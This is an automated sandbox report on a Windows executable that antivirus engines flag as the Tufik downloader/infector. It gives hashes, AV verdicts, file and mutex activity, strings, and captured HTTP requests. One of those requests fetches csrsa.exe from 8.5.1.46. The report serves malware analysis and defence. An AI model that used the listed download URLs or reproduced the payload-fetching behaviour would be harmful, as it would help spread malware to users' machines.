Analysis Date2015-01-21 10:03:54
MD566c2c6c3dbeb06144442dbc43f49cf30
SHA1f0c423207c282f9df1058d9834936f663ee78007

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c7183e3bbc2efd709e93caa2aa44a1b2 sha1: ea4c61161ffc63d2d607f1afc280fad77aaf51c9 size: 37376
Section.rdata md5: 9229e11cae2b383e1a604049bdc4d2dc sha1: db6b8ccfdcca2e65ebb079983672437df88be11a size: 8704
Section.data md5: e2653c64ab28c67fa8d441df896da919 sha1: 7d744210ff002dfd0c9f280d1f2c044551293122 size: 4096
Section.rsrc md5: f130297701bb2cf903b6d2004528d193 sha1: 44a8a25a51d3e51b4d604ef1bffff36e766e4a4d size: 15872
Section.text md5: 527bcb04a3e738364c3e34879cfd2600 sha1: f156dfff5086c3f21f20e1b0f84cbe9f73c421c6 size: 5120
Timestamp2013-02-19 09:34:16
VersionLegalCopyright: Copyright 酷狗计算机科技有限公司(C) 2013
InternalName: RunGame
FileVersion: 1, 0, 0, 1
CompanyName: 酷狗计算机科技有限公司
Comments: 酷狗计算机科技有限公司
ProductName: simdown 应用程序
ProductVersion: 1, 0, 0, 1
FileDescription: RunGame 应用程序
OriginalFilename: RunGame.exe
PEhasha3a300a5aff3bee511fe1c5dfff286fcda2d91ac
IMPhash17ea0951b5b79b4cac9a74b3a020bfbb
AV360 SafeVirus.Win32.TuFik.C
AVAd-AwareWin32.Tufik.P
AVAlwil (avast)Tufik:Win32:Tufik
AVArcabit (arcavir)Win32.Tufik.P
AVAuthentiumW32/Tufik.A.gen!Eldorado
AVAvira (antivir)TR/Dldr.Genome.agor
AVBullGuardWin32.Tufik.P
AVCA (E-Trust Ino)Win32/tufik.J
AVCAT (quickheal)W32.Tufik.gen
AVClamAVTrojan.Downloader-98394
AVDr. WebTrojan.DownLoader.4268
AVEmsisoftWin32.Tufik.P
AVEset (nod32)Win32/Tufik.NAA virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Tufik.A.gen!Eldorado
AVF-SecureWin32.Tufik.P
AVGrisoft (avg)Win32/Tufik.A
AVIkarusVirus.Win32.Tufik
AVK7Trojan-Downloader ( 00132cab1 )
AVKasperskyVirus.Win32.Pioneer.ak
AVMalwareBytesno_virus
AVMcafeeW32/Tufik
AVMicrosoft Security EssentialsError Scanning File
AVMicroWorld (escan)Win32.Tufik.P
AVRisingWin32.Tufik.p
AVSophosW32/Tufik-Fam
AVSymantecW32.Tufik.B!inf
AVTrend MicroPE_TUFIK.JK-1
AVVirusBlokAda (vba32)Virus.Expiro.ad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.mdmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.hdmp
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Setup.exe
Creates File\Device\Afd\AsyncConnectHlp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\tpm1.tmp
Creates Mutexopen
Creates Mutexsimdownmutex
Winsock DNS8.5.1.46
Winsock URLhttp://downmini.kugou.com/GouWo_1201.exe
Winsock URLhttp://8.5.1.46/csrsa.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex_SHuassist.mtx
Creates MutexShell.CMruPidlList

Network Details:

DNS85773.com
Type: A
8.5.1.46
DNSkgnop1.kugou.com
Type: A
112.90.229.27
DNSkgnop1.kugou.com
Type: A
112.90.228.6
DNSkgnop1.kugou.com
Type: A
112.90.228.7
DNSdownmini.kugou.com
Type: A
HTTP GEThttp://8.5.1.46/csrsa.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://downmini.kugou.com/GouWo_1201.exe
User-Agent:
Flows TCP192.168.1.1:1032 ➝ 8.5.1.46:80
Flows TCP192.168.1.1:1033 ➝ 112.90.229.27:80

Raw Pcap
0x00000000 (00000)   47455420 2f637372 73612e65 78652048   GET /csrsa.exe H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20382e35 2e312e34 360d0a43   ost: 8.5.1.46..C
0x000000b0 (00176)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000c0 (00192)   416c6976 650d0a0d 0a                  Alive....

0x00000000 (00000)   47455420 2f476f75 576f5f31 3230312e   GET /GouWo_1201.
0x00000010 (00016)   65786520 48545450 2f312e31 0d0a486f   exe HTTP/1.1..Ho
0x00000020 (00032)   73743a20 646f776e 6d696e69 2e6b7567   st: downmini.kug
0x00000030 (00048)   6f752e63 6f6d0d0a 43616368 652d436f   ou.com..Cache-Co
0x00000040 (00064)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x00000050 (00080)   0a0d0a6f 7a696c6c 612f342e 30202863   ...ozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20382e35 2e312e34 360d0a43   ost: 8.5.1.46..C
0x000000b0 (00176)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000c0 (00192)   416c6976 650d0a0d 0a                  Alive....


Strings
\
.CC
 
00-+ 

080404b0
1, 0, 0, 1
(C) 2013
Comments
CompanyName
Copyright 
FileDescription
FileVersion
                                 H
         (((((                  H
         h((((                  H
InternalName
KERNEL32.DLL
LegalCopyright
mscoree.dll
@(null)
OriginalFilename
ProductName
ProductVersion
RunGame
RunGame 
RunGame.exe
simdown 
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
                          
"+^ +]
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0SSSSS
130219094039Z0#
2Terms of use at https://www.verisign.com/rpa (c)101.0,
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
An application has made an attempt to load the C runtime library incorrectly.
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
CloseHandle
CONOUT$
CorExitProcess
CreateDirectoryA
CreateFileA
CreateMutexA
CreateProcessA
- CRT not initialized
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DeleteFileA
DOMAIN error
EncodePointer
EnterCriticalSection
ExitProcess
February
(f@f;F
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
GetACP
GetActiveWindow
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTimeAsFileTime
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserObjectInformationA
GouWo\1006\KGGouwo.exe
`h````
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtYHHt
http://downmini.kugou.com/GouWo_1201.exe
http://game.kugou.com/AdsPage/2013/01/DiscMicroStartBox.htm?cid=1201
HttpQueryInfoA
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
InternetCloseHandle
InternetOpenA
InternetOpenUrlA
InternetReadFile
IsDebuggerPresent
IsValidCodePage
JanFebMarAprMayJunJulAugSepOctNovDec
January
j@j ^V
j"^SSSSS
KERNEL32.dll
KGGWSetup_1003.exe
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadLibraryA
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
MoveFileA
MultiByteToWideChar
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
nqvLoadLibraryA
(null)
October
Please contact the application's support team for more information.
PPPPPPPP
Program: 
<program name unknown>
PSSSSSS
- pure virtual function call
QQ.exe
QueryPerformanceCounter
`.rdata
Recycler
ReleaseMutex
RemoveDirectoryA
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
      <requestedPrivileges>
Rich46
RSSSSS
RtlUnwind
runtime error 
Runtime Error!
Saturday
    </security>
    <security>
September
SetFileAttributesA
SetFilePointer
SetHandleCount
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
shell32
SHELL32.dll
ShellExecuteA
SHGetSpecialFolderPathA
simdownmutex
SING error
%s\%s.lnk
%s\%s mini#1|from#12
^SSSSS
Sunday
SunMonTueWedThuFriSat
svYvgethostbyname
Symantec Corporation100.
'Symantec Time Stamping Services CA - G2
tehU5@
TerminateProcess
.text 
@.text 
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
@T,MZM
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
t"SS9]
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
uBhN2@
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UQPXY]Y[
URLDownloadToFileA
Urlmon
URPQQh|z@
user32
USER32.DLL
uShellExecuteA
vCloseHandle
vCreateFileA
vCreateFileMappingA
vCreateMutexA
vCreateThread
%VeriSign Class 3 Code Signing 2010 CA
VeriSign, Inc.1
VeriSign Trust Network1;09
vFindClose
vFindFirstFileA
vFindNextFileA
vGetDriveTypeA
vGetFileSize
vGetLastError
vGetLocalTime
vGetLogicalDriveStringsA
vGetTempPathA
vGlobalAlloc
vGlobalFree
VirtualAlloc
VirtualFree
vlstrcatA
vlstrcmpA
vlstrcpyA
vlstrlenA
vMapViewOfFile
v	N+D$
vRtlMoveMemory
vSetEndOfFile
vSetFilePointer
vshlwapi
vSleep
vStrStrIA
vUnmapViewOfFile
vWriteFile
WaitForSingleObject
Wednesday
WideCharToMultiByte
WINDOW
WININET.dll
WriteConsoleA
WriteConsoleW
WriteFile
xppwpp
xpxxxx
Xvinet_ntoa
XvWs2_32
:XvWSAStartup
>=Yt1j